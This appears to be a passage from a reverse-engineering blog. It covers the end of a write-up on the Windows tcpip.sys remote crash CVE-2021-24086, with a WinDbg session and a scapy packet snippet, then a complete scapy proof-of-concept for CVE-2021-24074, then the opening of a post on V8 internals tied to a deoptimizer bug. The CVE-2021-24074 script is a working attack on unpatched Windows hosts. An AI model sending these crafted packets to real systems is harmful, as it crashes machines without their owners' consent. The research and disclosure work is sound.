It is a fragment that is 0x10020 bytes long (the 40-byte IPv6 header plus the 0xfff8 bytes announced in its payload length field), and you can see that the ndiskd extension walks the long MDL chain that describes the content of this fragment. The last MDL is the header of the UDP part of the fragment. What is left to do is to trigger another reassembly. What if we send another fragment that is part of the same group; would this trigger another reassembly?
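The numbers in this dump line up with the sizes that show up in the debugger session further down. The arithmetic below is a sketch under two assumptions of mine: the Length value printed by ndiskd is hexadecimal (decimal values are printed with a 0n prefix), and HeaderAndOptionsLength is the unfragmentable part plus the 40-byte IPv6 header, which is consistent with the 0x28 seen in the earlier two-fragment test.

```python
IPV6_HEADER_SIZE = 40
FRAGMENT_HEADER_SIZE = 8
UDP_HEADER_SIZE = 8

# Payload length field taken from the dumped IPv6 header (bytes 'ff f8').
payload_length = 0xFFF8
nb_length = IPV6_HEADER_SIZE + payload_length

# Everything between the IPv6 header and the inner fragment header is
# the unfragmentable part of the packet that gets reassembled next.
unfragmentable = payload_length - FRAGMENT_HEADER_SIZE - UDP_HEADER_SIZE
header_and_options = unfragmentable + IPV6_HEADER_SIZE
truncated = header_and_options & 0xFFFF

print(hex(nb_length))           # size of the reassembled NB
print(hex(header_and_options))  # size requested from NdisGetDataBuffer
print(hex(truncated))           # size passed to NetioRetreatNetBuffer
```

The last two values are the ones to look for in edx and rdx when the second reassembly happens.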

Well, let's see if the below works I guess:

reassembled_pkt_2 = Ether() \
/ IPv6(dst = args.target) \
/ IPv6ExtHdrFragment(id = second_pkt_id, m = 0, offset = 1, nh = 17) \
/ 'doar-e ftw'

sendp(reassembled_pkt_2, iface = args.iface)


Here is what we see in WinDbg:

kd> bp tcpip!Ipv6pReassembleDatagram

; This is the first reassembly; the output packet is the first large fragment

kd> g
Breakpoint 0 hit
tcpip!Ipv6pReassembleDatagram:
fffff8054a5cdd6c 4488442418      mov     byte ptr [rsp+18h],r8b

; This is the second reassembly; it combines the first very large fragment, and the second fragment we just sent

kd> g
Breakpoint 0 hit
tcpip!Ipv6pReassembleDatagram:
fffff8054a5cdd6c 4488442418      mov     byte ptr [rsp+18h],r8b

...

; Let's see the bug happen live!

kd>
tcpip!Ipv6pReassembleDatagram+0xce:
fffff8054a5cde3a 0fb79424a8000000 movzx   edx,word ptr [rsp+0A8h]

kd>
tcpip!Ipv6pReassembleDatagram+0xd6:
fffff8054a5cde42 498bce          mov     rcx,r14

kd>
tcpip!Ipv6pReassembleDatagram+0xd9:
fffff8054a5cde45 e80a35ecff      call    tcpip!NetioRetreatNetBuffer (fffff8054a491354)

kd> r @edx
edx=10 <- truncated size

// ...

kd>
tcpip!Ipv6pReassembleDatagram+0xe6:
fffff8054a5cde52 8b9424a8000000  mov     edx,dword ptr [rsp+0A8h]

kd>
tcpip!Ipv6pReassembleDatagram+0xed:
fffff8054a5cde59 41b901000000    mov     r9d,1

kd>
tcpip!Ipv6pReassembleDatagram+0xf3:
fffff8054a5cde5f 8364242000      and     dword ptr [rsp+20h],0

kd>
tcpip!Ipv6pReassembleDatagram+0xf8:
fffff8054a5cde64 4533c0          xor     r8d,r8d

kd>
tcpip!Ipv6pReassembleDatagram+0xfb:
fffff8054a5cde67 498bce          mov     rcx,r14

kd>
tcpip!Ipv6pReassembleDatagram+0xfe:
fffff8054a5cde6a 48ff1507630700  call    qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff8054a644178)]

kd> r @rdx
rdx=0000000000010010 <- non truncated size

kd> p
tcpip!Ipv6pReassembleDatagram+0x105:
fffff8054a5cde71 0f1f440000      nop     dword ptr [rax+rax]

kd> r @rax
rax=0000000000000000 <- NdisGetDataBuffer returned NULL!!!

kd> g
KDTARGET: Refreshing KD connection

*** Fatal System Error: 0x000000d1
(0x0000000000000000,0x0000000000000002,0x0000000000000001,0xFFFFF8054A5CDEBB)

Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

nt!DbgBreakPointWithStatus:
fffff805473c46a0 cc              int     3

kd> kc
# Call Site
00 nt!DbgBreakPointWithStatus
01 nt!KiBugCheckDebugBreak
02 nt!KeBugCheck2
03 nt!KeBugCheckEx
04 nt!KiBugCheckDispatch
05 nt!KiPageFault
06 tcpip!Ipv6pReassembleDatagram
0e nt!KeExpandKernelStackAndCalloutInternal
0f nt!KeExpandKernelStackAndCalloutEx
11 NDIS!ndisMIndicateNetBufferListsToOpen
17 netvsc!NvscKmclProcessPacket
18 nt!KiInitializeKernel
19 nt!KiSystemStartup
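For readers not used to reading bugcheck parameters, here is a small Python sketch that decodes the four values printed above for bugcheck 0xD1 (DRIVER_IRQL_NOT_LESS_OR_EQUAL). The function name and the dictionaries are mine; the function start address is the breakpoint address from this session.

```python
IRQL_NAMES = {0: 'PASSIVE_LEVEL', 1: 'APC_LEVEL', 2: 'DISPATCH_LEVEL'}
ACCESS_NAMES = {0: 'read', 1: 'write'}


def decode_bugcheck_d1(params, function_start):
    """Decode the four parameters of a 0xD1 bugcheck."""
    address, irql, access, faulting_ip = params
    return {
        'address': address,                                # memory referenced
        'irql': IRQL_NAMES.get(irql, hex(irql)),           # IRQL at the time
        'access': ACCESS_NAMES.get(access, hex(access)),   # kind of access
        'offset': faulting_ip - function_start,            # offset in function
    }


info = decode_bugcheck_d1(
    (0x0000000000000000, 0x2, 0x1, 0xFFFFF8054A5CDEBB),
    function_start=0xFFFFF8054A5CDD6C,  # tcpip!Ipv6pReassembleDatagram
)
print(info['irql'], info['access'], hex(info['address']), hex(info['offset']))
```

In other words: a write to address 0 at DISPATCH_LEVEL from inside Ipv6pReassembleDatagram, which matches the store through the NULL Buffer pointer.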


Incredible! We managed to implement the recursive fragmentation idea we discussed. Wow, I really didn't think it would actually work. Moral of the day: leave no stone unturned, follow your intuitions and reach the state of no unknowns.

Conclusion

In this post I tried to take you with me through my journey to write a PoC for CVE-2021-24086, a true remote DoS vulnerability affecting Windows' tcpip.sys driver found by Microsoft's own @piazzt. From zero to remote BSoD. The PoC is available on my GitHub here: 0vercl0k/CVE-2021-24086.

It was a wild ride mainly because it all looked way too easy and because I ended up chasing a bunch of ghosts.

I am sure that I've lost about 99% of my readers as it is a fairly long and hairy post, but if you made it all the way here you should join and come hang out in the newly created Diary of a reverse-engineer Discord: https://discord.gg/4JBWKDNyYs. We're trying to build a community of people enjoying low-level subjects. Hopefully we can also generate more interest for external contributions :)

Last but not least, special greets to the usual suspects: @yrp604 and @__x86 and @jonathansalwan for proof-reading this article.

Bonus: CVE-2021-24074

Here is the PoC I built based on the high quality blogpost put out by Armis:

# Axel '0vercl0k' Souchet - April 4 2021
# Extremely detailed root-cause analysis was made by Armis:
# https://www.armis.com/resources/iot-security-blog/from-urgent-11-to-frag-44-microsoft-patches-critical-vulnerabilities-in-windows-tcp-ip-stack/
from scapy.all import *
import argparse
import codecs
import random

def trigger(args):
    '''
    kd> g
    oob?
    fffff804453c6f7a 4d8d2c1c        lea     r13,[r12+rbx]
    kd> p
    fffff804453c6f7e 498bd5          mov     rdx,r13
    kd> db @r13
    ffffb90e85b78220  c0 82 b7 85 0e b9 ff ff-38 00 04 10 00 00 00 00  ........8.......
    kd> dqs @r13 l1
    ffffb90e85b78220  ffffb90e85b782c0
    kd> p
    fffff804453c6f81 488d0d58830500  lea     rcx,[tcpip!Ipv4Global (fffff8044541f2e0)]
    kd>
    fffff804453c6f88 e8d7e1feff      call    tcpip!IppIsInvalidSourceAddressStrict (fffff804453b5164)
    kd> db @rdx
    kd> p
    fffff804453c6f8d 84c0            test    al,al
    kd> r.
    al=0000000000000000  al=0000000000000000
    kd> p
    fffff804453c6f8f 0f85de040000    jne     tcpip!Ipv4pReceiveRoutingHeader+0x663 (fffff804453c7473)
    kd>
    fffff804453c6f95 498bcd          mov     rcx,r13
    kd>
    Breakpoint 3 hit
    fffff804453c6f98 e8e7dff8ff      call    tcpip!Ipv4UnicastAddressScope (fffff80445354f84)
    kd> dqs @rcx l1
    ffffb90e85b78220  ffffb90e85b782c0

    Call-stack (skip first hit):
    kd> kc
    # Call Site
    02 tcpip!Ipv4pReassembleDatagram
    0a nt!KeExpandKernelStackAndCalloutInternal
    0b nt!KeExpandKernelStackAndCalloutEx

    Snippet:
    {
    // ...
    // kd> db @rax
    // ffffdc07ff209170  ff ff 04 00 61 62 63 00-54 24 30 48 89 14 01 48  ....abc.T$0H...H
    RoutingHeaderFirst = NdisGetDataBuffer(FirstNetBuffer, Packet->RoutingHeaderOptionLength, &v50[0].qw2, 1u, 0);
    NetioAdvanceNetBufferList(NetBufferList, v8);
    OptionLenFirst = RoutingHeaderFirst[1];
    LenghtOptionFirstMinusOne = (unsigned int)(unsigned __int8)RoutingHeaderFirst[2] - 1;
    RoutingOptionOffset = LOBYTE(Packet->RoutingOptionOffset);
    if (OptionLenFirst < 7u || LenghtOptionFirstMinusOne > OptionLenFirst - sizeof(IN_ADDR))
    {
    // ...
    goto Bail_0;
    }
    // ...
    '''
    id = random.randint(0, 0xff)
    # dst_ip isn't a broadcast IP because otherwise we fail a check in
    # Ipv4pReceiveRoutingHeader; if we don't take the below branch
    # we don't hit the interesting bits later:
    #   if (Packet->CurrentDestinationType == NlatUnicast) {
    #     v12 = &RoutingHeaderFirst[LenghtOptionFirstMinusOne];
    dst_ip = '192.168.2.137'
    src_ip = '120.120.120.0'
    # UDP
    nh = 17
    content = bytes(UDP(sport = 31337, dport = 31338) / '1')
    one = Ether() \
        / IP(
            src = src_ip,
            dst = dst_ip,
            flags = 1,
            proto = nh,
            frag = 0,
            id = id,
            options = [IPOption_Security(
                length = 0xb,
                security = 0x11,
                # This is used for as an ~upper bound in Ipv4pReceiveRoutingHeader:
                compartment = 0xffff,
                # This is the offset that allows us to index out of the
                # bounds of the second fragment.
                # Keep in mind that, the out of bounds data is first used
                # before triggering any corruption (in Ipv4pReceiveRoutingHeader):
                #   - IppIsInvalidSourceAddressStrict,
                #   - Ipv4UnicastAddressScope.
                # if (IppIsInvalidSourceAddressStrict(Ipv4Global, &RoutingHeaderFirst[LenghtOptionFirstMinusOne])
                #   || (Ipv4UnicastAddressScope(&RoutingHeaderFirst[LenghtOptionFirstMinusOne]),
                #       v13 = Ipv4UnicastAddressScope(&Packet->RoutingOptionSourceIp),
                #       v14 < v13) )
                # The upper byte of handling_restrictions is RoutingHeaderFirst[2] in the above snippet
                # Offset of 6 allows us to have &RoutingHeaderFirst[LenghtOptionFirstMinusOne] pointing on
                # one.IP.options.transmission_control_code; last byte is OOB.
                # kd>
                # tcpip!Ipv4pReceiveRoutingHeader+0x178:
                # fffff8045c076f88 e8d7e1feff call tcpip!IppIsInvalidSourceAddressStrict (fffff8045c065164)
                # kd> db @rdx
                # ffffdc07ff209175 62 63 00 54 24 30 48 89-14 01 48 c0 92 20 ff 07 bc.T$0H...H.. ..
                #                                ^
                #                                |_ oob
                handling_restrictions = (6 << 8),
                transmission_control_code = b'\x11\xc1\xa8'
            )]
        ) / content[: 8]
    two = Ether() \
        / IP(
            src = src_ip,
            dst = dst_ip,
            flags = 0,
            proto = nh,
            frag = 1,
            id = id,
            options = [
                IPOption_NOP(),
                IPOption_NOP(),
                IPOption_NOP(),
                IPOption_NOP(),
                IPOption_LSRR(
                    pointer = 0x8,
                    routers = ['11.22.33.44']
                ),
            ]
        ) / content[8: ]

    sendp([one, two], iface='eth1')

def main():
    parser = argparse.ArgumentParser()
    args = parser.parse_args()
    trigger(args)
    return

if __name__ == '__main__':
    main()


Modern attacks on the Chrome browser : optimizations and deoptimizations

17 November 2020 at 08:00

Introduction

In late 2019, I presented some work on hacking Chrome through its JavaScript engine at an internal Azimuth Security conference.

One of the topics I was playing with at that time was deoptimization, so I discussed, among other things, vulnerabilities in the deoptimizer. For my talk at InfiltrateCon 2020 in Miami I was planning to discuss several components of V8. One of them was the deoptimizer. But as you all know, things didn't quite go as expected this year and the event has been postponed several times.

This blog post is actually an internal write-up I made for Azimuth Security a year ago and we decided to finally release it publicly.

Also, if you want to get serious about breaking browsers and feel like joining us, we're currently looking for experienced hackers (US/AU/UK/FR or anywhere else remotely). Feel free to reach out on twitter or by e-mail.

Special thanks to the legendary Mark Dowd and John McDonald for letting me publish this here.

For those unfamiliar with TurboFan, you may want to read an Introduction to TurboFan first. Also, Benedikt Meurer gave a lot of very interesting talks that are strongly recommended to anyone interested in better understanding V8's internals.

Motivation

The commit

To understand this security bug, it is necessary to delve into V8's internals.

Fixes word64-lowered BigInt in FrameState accumulator

Bug: chromium:1016450
Change-Id: I4801b5ffb0ebea92067aa5de37e11a4e75dcd3c0
Reviewed-by: Georg Neis
Commit-Queue: Nico Hartmann


It fixes VisitFrameState and VisitStateValues in src/compiler/simplified-lowering.cc.

diff --git a/src/compiler/simplified-lowering.cc b/src/compiler/simplified-lowering.cc
index 2e8f40f..abbdae3 100644
--- a/src/compiler/simplified-lowering.cc
+++ b/src/compiler/simplified-lowering.cc
@@ -1197,7 +1197,7 @@
// TODO(nicohartmann): Remove, once the deoptimizer can rematerialize
// truncated BigInts.
if (TypeOf(input).Is(Type::BigInt())) {
-          ProcessInput(node, i, UseInfo::AnyTagged());
+          ConvertInput(node, i, UseInfo::AnyTagged());
}

(*types)[i] =
@@ -1220,11 +1220,22 @@
// Accumulator is a special flower - we need to remember its type in
// a singleton typed-state-values node (as if it was a singleton
// state-values node).
+    Node* accumulator = node->InputAt(2);
if (propagate()) {
-      EnqueueInput(node, 2, UseInfo::Any());
+      // TODO(nicohartmann): Remove, once the deoptimizer can rematerialize
+      // truncated BigInts.
+      if (TypeOf(accumulator).Is(Type::BigInt())) {
+        EnqueueInput(node, 2, UseInfo::AnyTagged());
+      } else {
+        EnqueueInput(node, 2, UseInfo::Any());
+      }
} else if (lower()) {
+      // TODO(nicohartmann): Remove, once the deoptimizer can rematerialize
+      // truncated BigInts.
+      if (TypeOf(accumulator).Is(Type::BigInt())) {
+        ConvertInput(node, 2, UseInfo::AnyTagged());
+      }
Zone* zone = jsgraph_->zone();
-      Node* accumulator = node->InputAt(2);
if (accumulator == jsgraph_->OptimizedOutConstant()) {
} else {
@@ -1237,7 +1248,7 @@
node->ReplaceInput(
2, jsgraph_->graph()->NewNode(jsgraph_->common()->TypedStateValues(
-                                          accumulator));
+                                          node->InputAt(2)));
}
}


This can be linked to a different commit that adds a related regression test:

Regression test for word64-lowered BigInt accumulator

This issue was fixed in https://chromium-review.googlesource.com/c/v8/v8/+/1873692

Bug: chromium:1016450
Change-Id: I56e1c504ae6876283568a88a9aa7d24af3ba6474
Commit-Queue: Nico Hartmann
Auto-Submit: Nico Hartmann
Reviewed-by: Jakob Gruber
Reviewed-by: Georg Neis

// Copyright 2019 the V8 project authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.

// Flags: --allow-natives-syntax --opt --no-always-opt

let g = 0;

function f(x) {
let y = BigInt.asUintN(64, 15n);
// Introduce a side effect to force the construction of a FrameState that
// captures the value of y.
g = 42;
try {
return x + y;
} catch(_) {
return y;
}
}

%PrepareFunctionForOptimization(f);
assertEquals(16n, f(1n));
assertEquals(17n, f(2n));
%OptimizeFunctionOnNextCall(f);
assertEquals(16n, f(1n));
assertOptimized(f);
assertEquals(15n, f(0));
assertUnoptimized(f);
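To see what this test exercises, here is a rough Python model of f. It is only a sketch: the BigInt class, as_uint_n and js_add are stand-ins I wrote for this purpose, and they model just two JavaScript rules, namely that BigInt.asUintN(64, v) wraps v modulo 2^64 and that adding a BigInt to a Number throws a TypeError.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class BigInt:
    """Stand-in for a JavaScript BigInt; plain Python numbers play Number."""
    value: int


def as_uint_n(bits: int, big: BigInt) -> BigInt:
    # BigInt.asUintN(bits, v): wrap v into the range [0, 2**bits).
    return BigInt(big.value % (1 << bits))


def js_add(x, y):
    x_big, y_big = isinstance(x, BigInt), isinstance(y, BigInt)
    if x_big and y_big:
        return BigInt(x.value + y.value)
    if x_big or y_big:
        # JavaScript refuses to mix BigInt and Number in an addition.
        raise TypeError('Cannot mix BigInt and other types')
    return x + y


def f(x):
    y = as_uint_n(64, BigInt(15))
    try:
        return js_add(x, y)
    except TypeError:
        return y


print(f(BigInt(1)))  # both operands are BigInts
print(f(0))          # Number + BigInt throws, so y itself is returned
```

The last call is the interesting one: according to the assertions in the test, it is also where the optimized code bails out, so the value of y returned from the catch block has to be recovered from what the FrameState recorded.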


Long story short

This vulnerability is a bug in the way the simplified lowering phase of TurboFan deals with FrameState and StateValues nodes. Those nodes are related to deoptimization.

During the code generation phase, using those nodes, TurboFan builds deoptimization input data that are used when the runtime bails out to the deoptimizer.

After a deoptimization, execution goes from optimized native code back to interpreted bytecode, so the deoptimizer needs to know where to deoptimize to (e.g. which bytecode offset?) and how to build a correct frame (e.g. which Ignition registers?). To do that, the deoptimizer uses the deoptimization input data built during code generation.

Using this bug, it is possible to make code generation incorrectly build deoptimization input data so that the deoptimizer will materialize a fake object. Then, it redirects the execution to an ignition bytecode handler that has an arbitrary object pointer referenced by its accumulator register.

Internals

To understand this bug, we want to know:

• what is ignition (because we deoptimize back to ignition)
• what is simplified lowering (because that's where the bug is)
• what is a deoptimization (because it is impacted by the bug and will materialize a fake object for us)

Ignition

Overview

V8 features an interpreter called Ignition. It uses TurboFan's macro-assembler. This assembler is architecture-independent and TurboFan is responsible for compiling these instructions down to the target architecture.

Ignition is a register machine. That means an opcode's inputs and outputs use only registers. There is also an accumulator, used as an implicit operand by many opcodes.

For every opcode, an associated handler is generated. Therefore, executing bytecode is mostly a matter of fetching the current opcode and dispatching it to the correct handler.

Let's observe the bytecode for a simple JavaScript function.

let opt_me = (o, val) => {
let value = val + 42;
o.x = value;
}
opt_me({x:1.1});


Using the --print-bytecode and --print-bytecode-filter=opt_me flags we can dump the corresponding generated bytecode.

Parameter count 3
Register count 1
Frame size 8
13 E> 0000017DE515F366 @    0 : a5                StackCheck
41 S> 0000017DE515F367 @    1 : 25 02             Ldar a1
45 E> 0000017DE515F369 @    3 : 40 2a 00          AddSmi [42], [0]
0000017DE515F36C @    6 : 26 fb             Star r0
53 S> 0000017DE515F36E @    8 : 25 fb             Ldar r0
57 E> 0000017DE515F370 @   10 : 2d 03 00 01       StaNamedProperty a0, [0], [1]
0000017DE515F374 @   14 : 0d                LdaUndefined
67 S> 0000017DE515F375 @   15 : a9                Return
Constant pool (size = 1)
0000017DE515F319: [FixedArray] in OldSpace
- map: 0x00d580740789 <Map>
- length: 1
0: 0x017de515eff9 <String[#1]: x>
Handler Table (size = 0)
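To get a feel for how a register machine with an accumulator runs this listing, here is a toy Python interpreter. It is a deliberately simplified sketch and not how V8 is implemented: the Frame class, the handler functions and the dictionary-based dispatch table are all made up, feedback slots are ignored, and val is given a value of 1 for the sake of the example.

```python
class Frame:
    def __init__(self, bytecode, registers, constants):
        self.bytecode = bytecode
        self.registers = registers    # a0, a1 (arguments) and r0 (local)
        self.constants = constants    # constant pool
        self.accumulator = None       # implicit operand of most opcodes
        self.pc = 0
        self.done = False


def stack_check(frame):
    pass  # nothing to model here


def ldar(frame, reg):
    frame.accumulator = frame.registers[reg]


def star(frame, reg):
    frame.registers[reg] = frame.accumulator


def add_smi(frame, imm, feedback_slot):
    frame.accumulator = frame.accumulator + imm


def sta_named_property(frame, obj_reg, name_index, feedback_slot):
    frame.registers[obj_reg][frame.constants[name_index]] = frame.accumulator


def lda_undefined(frame):
    frame.accumulator = None  # None stands in for undefined


def ret(frame):
    frame.done = True


DISPATCH_TABLE = {
    'StackCheck': stack_check, 'Ldar': ldar, 'Star': star, 'AddSmi': add_smi,
    'StaNamedProperty': sta_named_property, 'LdaUndefined': lda_undefined,
    'Return': ret,
}


def run(frame):
    # Fetch the current opcode and dispatch to its handler until Return.
    while not frame.done:
        opcode, *operands = frame.bytecode[frame.pc]
        frame.pc += 1
        DISPATCH_TABLE[opcode](frame, *operands)
    return frame.accumulator


BYTECODE = [
    ('StackCheck',), ('Ldar', 'a1'), ('AddSmi', 42, 0), ('Star', 'r0'),
    ('Ldar', 'r0'), ('StaNamedProperty', 'a0', 0, 1), ('LdaUndefined',),
    ('Return',),
]

o = {'x': 1.1}
frame = Frame(BYTECODE, {'a0': o, 'a1': 1, 'r0': None}, ['x'])
result = run(frame)
print(o, result)
```

Every value flows through the accumulator: Ldar loads it, AddSmi updates it in place, Star spills it to r0, and StaNamedProperty stores it into the object held in a0.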


Disassembling the function shows that the low level code is merely a trampoline to the interpreter entry point. In our case, running an x64 build, that means the trampoline jumps to the code generated by Builtins::Generate_InterpreterEntryTrampoline in src/builtins/x64/builtins-x64.cc.

d8> %DisassembleFunction(opt_me)
0000008C6B5043C1: [Code]
- map: 0x02ebfe8409b9 <Map>
kind = BUILTIN
name = InterpreterEntryTrampoline
compiler = unknown

Trampoline (size = 13)
0000008C6B504400     0  49ba80da52b0fd7f0000 REX.W movq r10,00007FFDB052DA80  (InterpreterEntryTrampoline)
0000008C6B50440A     a  41ffe2         jmp r10


This code simply fetches the instructions from the function's BytecodeArray and executes the corresponding ignition handler from a dispatch table.

d8> %DebugPrint(opt_me)
DebugPrint: 000000FD8C6CA819: [Function]
// ...
- code: 0x01524c1c43c1 <Code BUILTIN InterpreterEntryTrampoline>
- interpreted
- bytecode: 0x01b76929f331 <BytecodeArray[16]>
// ...


Below is the part of Builtins::Generate_InterpreterEntryTrampoline that loads the address of the dispatch table into the kInterpreterDispatchTableRegister. Then it selects the current opcode using the kInterpreterBytecodeOffsetRegister and kInterpreterBytecodeArrayRegister. Finally, it computes kJavaScriptCallCodeStartRegister = dispatch_table[bytecode * pointer_size] and then calls the handler. Those registers are described in src/codegen/x64/register-x64.h.

  // Load the dispatch table into a register and dispatch to the bytecode
// handler at the current bytecode offset.
Label do_dispatch;
__ bind(&do_dispatch);
__ Move(
kInterpreterDispatchTableRegister,
ExternalReference::interpreter_dispatch_table_address(masm->isolate()));
__ movzxbq(r11, Operand(kInterpreterBytecodeArrayRegister,
kInterpreterBytecodeOffsetRegister, times_1, 0));
__ movq(kJavaScriptCallCodeStartRegister,
Operand(kInterpreterDispatchTableRegister, r11,
times_system_pointer_size, 0));
__ call(kJavaScriptCallCodeStartRegister);
masm->isolate()->heap()->SetInterpreterEntryReturnPCOffset(masm->pc_offset());

// Any returns to the entry trampoline are either due to the return bytecode
// or the interpreter tail calling a builtin and then a dispatch.

// Get bytecode array and bytecode offset from the stack frame.
__ movq(kInterpreterBytecodeArrayRegister,
Operand(rbp, InterpreterFrameConstants::kBytecodeArrayFromFp));
__ movq(kInterpreterBytecodeOffsetRegister,
Operand(rbp, InterpreterFrameConstants::kBytecodeOffsetFromFp));
__ SmiUntag(kInterpreterBytecodeOffsetRegister,
kInterpreterBytecodeOffsetRegister);

// Either return, or advance to the next bytecode and dispatch.
Label do_return;
__ movzxbq(rbx, Operand(kInterpreterBytecodeArrayRegister,
kInterpreterBytecodeOffsetRegister, times_1, 0));
AdvanceBytecodeOffsetOrReturn(masm, kInterpreterBytecodeArrayRegister,
kInterpreterBytecodeOffsetRegister, rbx, rcx,
&do_return);
__ jmp(&do_dispatch);


Ignition handlers

Ignition handlers are implemented in src/interpreter/interpreter-generator.cc. They are declared using the IGNITION_HANDLER macro. Let's look at a few examples.

Below is the implementation of JumpIfTrue. The careful reader will notice that it is actually similar to the Code Stub Assembler code (used to implement some of the builtins).

// JumpIfTrue <imm>
//
// Jump by the number of bytes represented by an immediate operand if the
// accumulator contains true. This only works for boolean inputs, and
// will misbehave if passed arbitrary input values.
IGNITION_HANDLER(JumpIfTrue, InterpreterAssembler) {
Node* accumulator = GetAccumulator();
Node* relative_jump = BytecodeOperandUImmWord(0);
CSA_ASSERT(this, TaggedIsNotSmi(accumulator));
CSA_ASSERT(this, IsBoolean(accumulator));
JumpIfWordEqual(accumulator, TrueConstant(), relative_jump);
}


Binary instructions making use of inline caching actually execute code implemented in src/ic/binary-op-assembler.cc.

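// AddSmi <imm>
//
// Adds an immediate value <imm> to the value in the accumulator.
IGNITION_HANDLER(AddSmi, InterpreterBinaryOpAssembler) {
BinaryOpSmiWithFeedback(&BinaryOpAssembler::Generate_AddWithFeedback);
}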

void BinaryOpWithFeedback(BinaryOpGenerator generator) {
Node* lhs = LoadRegisterAtOperandIndex(0);
Node* rhs = GetAccumulator();
Node* context = GetContext();
Node* slot_index = BytecodeOperandIdx(1);
Node* maybe_feedback_vector = LoadFeedbackVector();

BinaryOpAssembler binop_asm(state());
Node* result = (binop_asm.*generator)(context, lhs, rhs, slot_index,
maybe_feedback_vector, false);
SetAccumulator(result);
Dispatch();
}


From this code, we understand that when executing AddSmi [42], [0], V8 ends up executing code generated by BinaryOpAssembler::Generate_AddWithFeedback. The left-hand side of the addition is operand 0 ([42] in this case) and the right-hand side is loaded from the accumulator register. The handler also loads a slot from the feedback vector using the index specified in operand 1. The result of the addition is stored in the accumulator.

It is interesting to observe the call to Dispatch. We might expect every handler to be called from the do_dispatch label of InterpreterEntryTrampoline, but the current Ignition handler may actually perform the dispatch itself (and thus does not go directly back to do_dispatch).
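To make this self-dispatching behaviour more concrete, here is a minimal toy interpreter in JavaScript. It is only a sketch of the idea and not V8 code: the opcode numbering, the single-operand AddSmi (the real one also takes a feedback slot) and the run helper are all assumptions made for the example.

```javascript
// Toy model of Ignition-style dispatch (not V8 code): every handler ends by
// dispatching to the next handler itself instead of returning to a central loop.
const LdaSmi = 0, AddSmi = 1, Return = 2; // hypothetical opcode numbering

function run(bytecode) {
  const state = { acc: 0, offset: 0, trace: [] };

  // Fetch the opcode byte at the current offset and jump through the table.
  function dispatch() {
    const opcode = bytecode[state.offset];
    state.trace.push(opcode);
    dispatchTable[opcode]();
  }

  const dispatchTable = [];
  dispatchTable[LdaSmi] = () => {
    state.acc = bytecode[state.offset + 1]; // load the immediate
    state.offset += 2;
    dispatch(); // the handler dispatches on its own
  };
  dispatchTable[AddSmi] = () => {
    state.acc += bytecode[state.offset + 1]; // accumulator += immediate
    state.offset += 2;
    dispatch();
  };
  dispatchTable[Return] = () => {
    // No dispatch here: control goes back to whoever started the chain.
  };

  dispatch();
  return state;
}

console.log(run([LdaSmi, 1, AddSmi, 42, Return]).acc); // 43
```

Real handlers tail-call the next handler, so the native stack does not grow. The recursive calls in this sketch do grow the JavaScript stack, which is fine for a handful of bytecodes.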

Debugging

There is a built-in feature for debugging Ignition bytecode that you can enable by setting v8_enable_trace_ignition to true and recompiling the engine. You may also want to change v8_enable_trace_feedbacks.

This unlocks some interesting flags in the d8 shell such as:

• --trace-ignition

There are also a few interesting runtime functions:

• Runtime_InterpreterTraceBytecodeEntry
  • prints ignition registers before executing an opcode
• Runtime_InterpreterTraceBytecodeExit
  • prints ignition registers after executing an opcode
• Runtime_InterpreterTraceUpdateFeedback
  • displays updates to the feedback vector slots

Let's try debugging a simple add function.

function add(a,b) {
return a + b;
}


We can now see a dump of ignition registers at every step of the execution using --trace-ignition.

      [          r1 -> 0x193680a1f8e9 <JSFunction add (sfi = 0x193680a1f759)> ]
[          r2 -> 0x3ede813004a9 <undefined> ]
[          r3 -> 42 ]
[          r4 -> 1 ]
-> 0x193680a1fa56 @    0 : a5                StackCheck
-> 0x193680a1fa57 @    1 : 25 02             Ldar a1
[          a1 -> 1 ]
[ accumulator <- 1 ]
-> 0x193680a1fa59 @    3 : 34 03 00          Add a0, [0]
[ accumulator -> 1 ]
[          a0 -> 42 ]
[ accumulator <- 43 ]
-> 0x193680a1fa5c @    6 : a9                Return
[ accumulator -> 43 ]
-> 0x193680a1f83a @   36 : 26 fb             Star r0
[ accumulator -> 43 ]
[          r0 <- 43 ]
-> 0x193680a1f83c @   38 : a9                Return
[ accumulator -> 43 ]


Simplified lowering

Simplified lowering is actually divided into three main phases:

1. The truncation propagation phase (RunTruncationPropagationPhase)
   • backward propagation of truncations
2. The type propagation phase (RunTypePropagationPhase)
   • forward propagation of types from type feedback
3. The lowering phase (Run, after calling the previous phases)
   • may lower nodes
   • may insert conversion nodes

To get a better understanding, we'll study the evolution of the sea of nodes graph for the function below :

function f(a) {
if (a) {
var x = 2;
}
else {
var x = 5;
}
return 0x42 % x;
}
%PrepareFunctionForOptimization(f);
f(true);
f(false);
%OptimizeFunctionOnNextCall(f);
f(true);


Propagating truncations

To understand how truncations get propagated, we trace simplified lowering using --trace-representation and look at the sea of nodes in Turbolizer right before the simplified lowering phase, that is, by selecting the escape analysis phase in the menu.

The first phase starts from the End node. It visits the node and then enqueues its inputs. It doesn't truncate any of its inputs. The output is tagged.

 visit #31: End (trunc: no-value-use)
initial #30: no-value-use

  void VisitNode(Node* node, Truncation truncation,
SimplifiedLowering* lowering) {
// ...
case IrOpcode::kEnd:
// ...
case IrOpcode::kJSParseInt:
VisitInputs(node);
// Assume the output is tagged.
return SetOutput(node, MachineRepresentation::kTagged);


Then, for every node in the queue, the corresponding visitor is called. In that case, only a Return node is in the queue.

The visitor indicates use information: the first input is truncated to a word32, the other inputs are not truncated, and the output is tagged.

  void VisitNode(Node* node, Truncation truncation,
SimplifiedLowering* lowering) {
// ...
switch (node->opcode()) {
// ...
case IrOpcode::kReturn:
VisitReturn(node);
// Assume the output is tagged.
return SetOutput(node, MachineRepresentation::kTagged);
// ...
}
}

void VisitReturn(Node* node) {
int tagged_limit = node->op()->ValueInputCount() +
OperatorProperties::GetContextInputCount(node->op()) +
OperatorProperties::GetFrameStateInputCount(node->op());
// Visit integer slot count to pop
ProcessInput(node, 0, UseInfo::TruncatingWord32());

// Visit value, context and frame state inputs as tagged.
for (int i = 1; i < tagged_limit; i++) {
ProcessInput(node, i, UseInfo::AnyTagged());
}
// Only enqueue other inputs (effects, control).
for (int i = tagged_limit; i < node->InputCount(); i++) {
EnqueueInput(node, i);
}
}


